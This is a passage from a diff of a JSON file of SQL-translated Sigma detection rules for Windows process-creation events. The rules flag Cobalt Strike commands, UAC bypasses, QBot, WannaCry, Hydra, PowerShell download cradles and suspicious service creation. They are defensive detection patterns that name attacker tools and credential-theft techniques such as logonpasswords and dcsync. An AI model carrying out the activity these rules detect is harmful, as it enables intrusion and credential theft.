conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", - "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "status": "test", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_qbot.yml" + }, + { + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1564.004" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Very unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", + "status": "test", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine 